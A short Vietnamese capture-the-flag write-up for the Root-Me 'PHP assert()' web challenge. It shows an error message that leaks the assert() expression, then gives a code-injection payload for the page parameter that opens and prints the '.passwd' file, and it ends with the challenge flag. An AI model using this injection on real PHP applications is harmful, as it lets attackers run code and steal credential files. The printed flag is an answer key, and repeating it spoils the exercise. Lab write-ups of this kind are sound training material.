# PHP assert()

Thử URL như sau:

`http://challenge01.root-me.org/web-serveur/ch47/?page=%27`

Trang web sẽ có vài dòng sau:

```
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /challenge/web-serveur/ch47/index.php(8) : assert code on line 1 Catchable fatal error: assert(): Failure evaluating code: strpos('includes/'.php', '..') === false in /challenge/web-serveur/ch47/index.php on line 8
```

Vậy trang này dùng hàm assert() và ta nhìn qua được cú pháp như trên.

Xét đoạn lệnh sau:

`','..')===false and $f=fopen('.passwd','r') and print fread($f,filesize('.passwd')) and strpos('`

Gán dòng trên vào URL sau đoạn ?page=

---

### Flag:

`x4Ss3rT1nglSn0ts4f3A7A1Lx`